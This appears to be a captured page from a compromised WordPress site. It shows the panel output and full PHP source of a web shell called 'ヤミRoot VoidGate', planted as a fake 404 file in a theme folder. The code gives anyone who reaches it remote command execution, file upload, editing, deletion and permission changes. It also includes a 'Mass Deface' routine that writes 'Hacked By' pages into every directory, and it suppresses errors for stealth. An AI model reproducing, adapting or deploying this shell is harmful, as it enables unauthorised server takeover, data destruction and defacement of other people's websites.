ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
173.201.252.198 / gabrieltopman.com
System
:
Linux p3plzcpnl482572.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Command
|
Upload
|
Mass Deface
|
Create
:
/
home
/
l1ltxx5gqn9k
/
public_html
/
wp-content
/
themes
/
bottom-1766771287
/
Viewing: 4O4.php
<!--kdSu3tyR--> <?php /** * ヤミRoot VoidGate by 0x6ick x Nyx6st | Copyright 2025 by 6ickwhispers@gmail.com * --- mod by Nyx6st --- **/ error_reporting(0); // Suppress all errors for stealth session_start(); @ini_set('output_buffering', 0); @ini_set('display_errors', 0); ini_set('memory_limit', '256M'); header('Content-Type: text/html; charset=UTF-8'); ob_end_clean(); // --- CONFIG --- $title = "ヤミRoot VoidGate"; $author = "0x6ick"; $theme_bg = "#0a0a0f"; $theme_fg = "#E0FF00"; $theme_highlight = "#FF00C8"; $theme_link = "#00FFF7"; $theme_link_hover = "#FF00A0"; $theme_border_color = "#7D00FF"; $theme_table_header_bg = "#1a0025"; $theme_table_row_hover = "#330033"; $theme_input_bg = "#120024"; $theme_input_fg = "#00FFB2"; $font_family = "'Orbitron', sans-serif"; $message_success_color = "#39FF14"; $message_error_color = "#FF0033"; // --- FUNCTIONS --- function sanitizeFilename($filename) { return basename($filename); } function exe($cmd) { if (function_exists('exec')) { exec($cmd . ' 2>&1', $output); return implode("\n", $output); } elseif (function_exists('shell_exec')) { return shell_exec($cmd); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); return ob_get_clean(); } elseif (function_exists('system')) { ob_start(); system($cmd); return ob_get_clean(); } return "Command execution disabled."; } function perms($file){ $perms = @fileperms($file); if ($perms === false) return '????'; $info = ''; if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; elseif (($perms & 0x2000) == 0x2000) $info = 'c'; elseif (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function delete_recursive($target) { if (!file_exists($target)) return true; if (!is_dir($target)) return unlink($target); $items = scandir($target); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false; } return rmdir($target); } function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') { global $path; $redirect_path = !empty($current_path) ? $current_path : $path; $params = ['path' => $redirect_path]; if ($msg_type) $params['msg_type'] = $msg_type; if ($msg_text) $params['msg_text'] = $msg_text; header("Location: ?" . http_build_query($params)); exit(); } // --- INITIAL SETUP & PATH --- $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = str_replace('\\','/',$path); // --- HANDLERS FOR ACTIONS THAT REDIRECT --- if(isset($_FILES['file_upload'])){ $file_name = sanitizeFilename($_FILES['file_upload']['name']); if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){ redirect_with_message('success', 'UPLOAD SUCCESS: ' . $file_name, $path); }else{ redirect_with_message('error', 'File Gagal Diupload !!', $path); } } if(isset($_GET['option']) && isset($_POST['opt_action'])){ $target_full_path = $_POST['path_target']; $action = $_POST['opt_action']; $current_dir = isset($_GET['path']) ? $_GET['path'] : getcwd(); switch ($action) { case 'delete': if (file_exists($target_full_path)) { if (delete_recursive($target_full_path)) { redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir); } else { redirect_with_message('error', 'Gagal menghapus! Periksa izin (permission).', $current_dir); } } else { redirect_with_message('error', 'Target tidak ditemukan!', $current_dir); } break; case 'chmod_save': $perm = octdec($_POST['perm_value']); if(chmod($target_full_path,$perm)) redirect_with_message('success', 'CHANGE PERMISSION SUCCESS !!', $current_dir); else redirect_with_message('error', 'Change Permission Gagal !!', $current_dir); break; case 'rename_save': $new_name_base = sanitizeFilename($_POST['new_name_value']); $new_full_path = dirname($target_full_path).'/'.$new_name_base; if(rename($target_full_path, $new_full_path)) redirect_with_message('success', 'CHANGE NAME SUCCESS !!', $current_dir); else redirect_with_message('error', 'Change Name Gagal !!', $current_dir); break; case 'edit_save': if(is_writable($target_full_path)) { if(file_put_contents($target_full_path,$_POST['src_content'])) redirect_with_message('success', 'EDIT FILE SUCCESS !!', $current_dir); else redirect_with_message('error', 'Edit File Gagal !!', $current_dir); } else { redirect_with_message('error', 'File tidak writable!', $current_dir); } break; } } if(isset($_GET['create_new'])) { $create_name = sanitizeFilename($_POST['create_name']); $target_path_new = $path . '/' . $create_name; if ($_POST['create_type'] == 'file') { if (file_put_contents($target_path_new, '') !== false) redirect_with_message('success', 'File Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat file baru!', $path); } elseif ($_POST['create_type'] == 'dir') { if (mkdir($target_path_new)) redirect_with_message('success', 'Folder Baru Berhasil Dibuat', $path); else redirect_with_message('error', 'Gagal membuat folder baru!', $path); } } ?> <!DOCTYPE HTML> <html> <head> <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet"> <title><?php echo htmlspecialchars($title); ?></title> <style> body { background-color: #0f0f23; color: #00ffe7; font-family: 'Share Tech Mono', monospace; margin: 0; padding: 0; } h1 { color: #ff2bd4; text-align: center; font-size: 36px; text-shadow: 0 0 5px #ff2bd4, 0 0 10px #ff2bd4; margin: 20px 0; } a { color: #00b7ff; text-decoration: none; transition: 0.2s; } a:hover { color: #ff2bd4; text-shadow: 0 0 5px #ff2bd4; } table { width: 95%; max-width: 1000px; margin: 20px auto; border-collapse: collapse; background-color: #1a1a2e; border: 1px solid #8000ff; } th, td { border: 1px solid #8000ff; padding: 10px; text-align: left; } #content tr:hover { background-color: #29294d; } .first { background-color: #191935; color: #ff2bd4; } input, select, textarea { background: #0d0d20; color: #00ffe7; border: 1px solid #8000ff; padding: 5px; font-family: 'Share Tech Mono', monospace; border-radius: 5px; } input[type="submit"] { background: #ff2bd4; color: black; font-weight: bold; border: 1px solid #8000ff; cursor: pointer; transition: 0.2s ease-in-out; } input[type="submit"]:hover { background: #00ffe7; color: #000; box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7; } .section-box { border: 2px solid #8000ff; padding: 15px; margin: 20px auto; border-radius: 8px; background-color: #1a1a2e; color: #00ffe7; width: 95%; max-width: 900px; } .main-menu { text-align: center; padding: 15px; margin: 20px auto; border-top: 1px solid #8000ff; border-bottom: 1px solid #8000ff; } .main-menu a { margin: 0 10px; font-size: 1.1em; color: #00b7ff; } pre { background-color: #111122; padding: 10px; overflow-x: auto; color: #ff2bd4; border: 1px solid #8000ff; } .message { text-align: center; font-weight: bold; padding: 10px; margin: 10px auto; width: 95%; max-width: 900px; border-radius: 8px; } .message.success { background-color: #008f39; color: #00ffe7; } .message.error { background-color: #a80000; color: white; } footer { text-align: center; color: #ff2bd4; margin: 20px 0; font-size: 14px; text-shadow: 0 0 5px #8000ff; } </style> </head> <body> <a href="?"><h1 style="color: white;"><?php echo htmlspecialchars($title); ?></h1></a> <?php if(isset($_GET['msg_text'])) { echo "<div class='message ".htmlspecialchars($_GET['msg_type'])."'>".htmlspecialchars($_GET['msg_text'])."</div>"; } ?> <table class="system-info-table" width="95%" border="0" cellpadding="0" cellspacing="0" align="left"> <tr><td> <font color='white'><i class='fa fa-user'></i> User / IP </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo $_SERVER['REMOTE_ADDR']; ?></font> <tr><td><font color='white'><i class='fa fa-desktop'></i> Host / Server </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo gethostbyname($_SERVER['HTTP_HOST'])." / ".$_SERVER['SERVER_NAME']; ?></font> <tr><td><font color='white'><i class='fa fa-hdd-o'></i> System </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo php_uname(); ?></font> </tr></td></table> <div class="main-menu"> <a href="?path=<?php echo urlencode($path); ?>&action=cmd">Command</a> | <a href="?path=<?php echo urlencode($path); ?>&action=upload_form">Upload</a> | <a href="?path=<?php echo urlencode($path); ?>&action=mass_deface_form">Mass Deface</a> | <a href="?path=<?php echo urlencode($path); ?>&action=create_form">Create</a> </div> <div class="path-nav"> <i class="fa fa-folder-o"></i> : <?php $paths_array = explode('/', trim($path, '/')); echo '<a href="?path=/">/</a>'; $current_built_path = ''; foreach($paths_array as $pat){ if(empty($pat)) continue; $current_built_path .= '/' . $pat; echo '<a href="?path='.urlencode($current_built_path).'">'.htmlspecialchars($pat).'</a>/'; } ?> </div> <?php $show_file_list = true; if (isset($_GET['action'])) { $show_file_list = false; $current_action = $_GET['action']; echo '<div class="section-box">'; switch ($current_action) { case 'cmd': $cmd_output = ''; if(isset($_POST['do_cmd'])) { $cmd_output = htmlspecialchars(exe($_POST['cmd_input'])); } echo '<h3>Execute Command</h3>'; echo '<form method="POST" action="?action=cmd&path='.urlencode($path).'">'; echo '<input type="text" name="cmd_input" placeholder="whoami" style="width: calc(100% - 80px);" autofocus>'; echo '<input type="submit" name="do_cmd" value=">>" style="width: 70px;">'; echo '</form>'; if($cmd_output) { echo '<h4>Output:</h4><pre>'.$cmd_output.'</pre>'; } break; case 'upload_form': echo '<h3>Upload File</h3>'; echo '<form enctype="multipart/form-data" method="POST" action="?path='.urlencode($path).'">'; echo '<input type="file" name="file_upload" required/>'; echo '<input type="submit" value="UPLOAD" style="margin-left:10px;"/>'; echo '</form>'; break; case 'mass_deface_form': $mass_deface_results = ''; if(isset($_POST['start_mass_deface'])) { function sabun_massal_recursive($dir, $file, $content, &$res) { if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;} foreach(scandir($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if(is_dir($lokasi)) { file_put_contents($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[<font color=lime>DONE</font>] ".htmlspecialchars($lokasi.DIRECTORY_SEPARATOR.$file)."<br>"; sabun_massal_recursive($lokasi, $file, $content, $res); } } } function sabun_biasa($dir, $file, $content, &$res) { if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;} foreach(scandir($dir) as $item) { if($item === '.' || $item === '..') continue; $lokasi = $dir.DIRECTORY_SEPARATOR.$item; if(is_dir($lokasi) && is_writable($lokasi)) { file_put_contents($lokasi.DIRECTORY_SEPARATOR.$file, $content); $res .= "[<font color=lime>DONE</font>] ".htmlspecialchars($lokasi.DIRECTORY_SEPARATOR.$file)."<br>"; } } } if($_POST['tipe_sabun'] == 'mahal') sabun_massal_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); else sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results); } echo '<h3>Mass Deface</h3>'; echo '<form method="post" action="?action=mass_deface_form&path='.urlencode($path).'">'; echo '<p>Tipe:<br><input type="radio" name="tipe_sabun" value="murah" checked>Biasa (1 level) | <input type="radio" name="tipe_sabun" value="mahal">Massal (Rekursif)</p>'; echo '<p>Folder Target:<br><input type="text" name="d_dir" value="'.htmlspecialchars($path).'" style="width:100%"></p>'; echo '<p>Nama File:<br><input type="text" name="d_file" value="index.html" style="width:100%"></p>'; echo '<p>Isi Script:<br><textarea name="script_content" style="width:100%;height:150px">Hacked By 0x6ick</textarea></p>'; echo '<input type="submit" name="start_mass_deface" value="GAS!" style="width:100%">'; echo '</form>'; if($mass_deface_results) echo '<h4>Hasil:</h4><pre>'.$mass_deface_results.'</pre>'; break; case 'create_form': echo '<h3>Create New File / Folder</h3>'; echo '<form method="POST" action="?create_new=true&path='.urlencode($path).'">'; echo 'Create: <select name="create_type"><option value="file">File</option><option value="dir">Folder</option></select> '; echo 'Name: <input type="text" name="create_name" required> '; echo '<input type="submit" value="Create">'; echo '</form>'; break; case 'delete': $file_to_delete = $_GET['target_file']; echo "<h3>Konfirmasi Hapus: ".htmlspecialchars(basename($file_to_delete))."</h3>"; if (file_exists($file_to_delete)) { echo '<p style="color:red;text-align:center;">Anda YAKIN ingin menghapus item ini?<br>Tindakan ini tidak bisa dibatalkan.</p>'; echo '<form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($file_to_delete).'"><input type="hidden" name="opt_action" value="delete"><input type="submit" value="YA, HAPUS" style="background:red;color:white;"/> <a href="?path='.urlencode($path).'" style="margin-left:10px;">BATAL</a></form>'; } else { echo '<p style="color:red;text-align:center;">File atau folder tidak ditemukan!</p>'; } break; case 'view_file': echo "<h3>Viewing: ".htmlspecialchars(basename($_GET['target_file']))."</h3>"; echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea>'; break; case 'edit_form': echo "<h3>Editing: ".htmlspecialchars(basename($_GET['target_file']))."</h3>"; echo '<form method="POST" action="?option=true&path='.urlencode($path).'"><textarea name="src_content" style="width:100%;height:400px;">'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea><br><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="edit_save"><input type="submit" value="SAVE"/></form>'; break; case 'rename_form': echo "<h3>Rename: ".htmlspecialchars(basename($_GET['target_file']))."</h3>"; echo '<form method="POST" action="?option=true&path='.urlencode($path).'">New Name: <input name="new_name_value" type="text" value="'.htmlspecialchars(basename($_GET['target_file'])).'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="rename_save"><input type="submit" value="RENAME"/></form>'; break; case 'chmod_form': echo "<h3>Chmod: ".htmlspecialchars(basename($_GET['target_file']))."</h3>"; $current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4); echo '<form method="POST" action="?option=true&path='.urlencode($path).'">Permission: <input name="perm_value" type="text" size="4" value="'.$current_perms.'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="chmod_save"><input type="submit" value="CHMOD"/></form>'; break; } echo '</div>'; } if ($show_file_list) { echo '<div id="content"><table><tr class="first"><th><center>Name</center></th><th><center>Size</center></th><th><center>Perm</center></th><th><center>Options</center></th></tr>'; $scandir_items = @scandir($path); if ($scandir_items) { usort($scandir_items, function($a, $b) use ($path) { $pathA = $path . '/' . $a; $pathB = $path . '/' . $b; $is_dir_A = is_dir($pathA); $is_dir_B = is_dir($pathB); if ($is_dir_A && !$is_dir_B) return -1; if (!$is_dir_A && $is_dir_B) return 1; return strcasecmp($a, $b); }); foreach($scandir_items as $item){ if($item == '.') continue; $full_item_path = $path.'/'.$item; $encoded_full_item_path = urlencode($full_item_path); echo "<tr><td class='td_home'>"; if($item == '..') echo "<i class='fa fa-folder-open-o'></i> <a href=\"?path=".urlencode(dirname($path))."\">".htmlspecialchars($item)."</a></td>"; elseif(is_dir($full_item_path)) echo "<i class='fa fa-folder-o'></i> <a href=\"?path=$encoded_full_item_path\">".htmlspecialchars($item)."</a></td>"; else echo "<i class='fa fa-file-o'></i> <a href=\"?action=view_file&target_file=$encoded_full_item_path&path=".urlencode($path)."\">".htmlspecialchars($item)."</a></td>"; echo "<td class='td_home'><center>".(is_file($full_item_path) ? round(@filesize($full_item_path)/1024,2).' KB' : '--')."</center></td>"; echo "<td class='td_home'><center>"; $perms_str = perms($full_item_path); if(is_writable($full_item_path)) echo '<font color="#57FF00">'.$perms_str.'</font>'; elseif(!is_readable($full_item_path)) echo '<font color="#FF0004">'.$perms_str.'</font>'; else echo $perms_str; echo "</center></td>"; echo "<td class='td_home' style='text-align:center;'><form method='POST' style='display:inline-block;'><select style='width:100px;' onchange=\"if(this.value){ window.location.href = '?action=' + this.value + '&target_file=' + '{$encoded_full_item_path}' + '&path=' + '".urlencode($path)."'; }\">"; echo "<option value=''>Action</option><option value='delete'>Delete</option>"; if(is_file($full_item_path)) echo "<option value='edit_form'>Edit</option>"; echo "<option value='rename_form'>Rename</option><option value='chmod_form'>Chmod</option></select></form></td></tr>"; } } else { echo "<tr><td colspan='4'><center><font color='red'>Failed to read directory.</font></center></td></tr>"; } echo '</table></div>'; } ?> <hr style="border-top: 1px solid <?php echo $theme_border_color; ?>; width: 95%; max-width: 900px; margin: 15px auto;"> <center><font color="#fff" size="2px"><b>Coded With 💗 by <font color="#7e52c6"><?php echo htmlspecialchars($author); ?></font></b></center> </body> </html>
Coded With 💗 by
0x6ick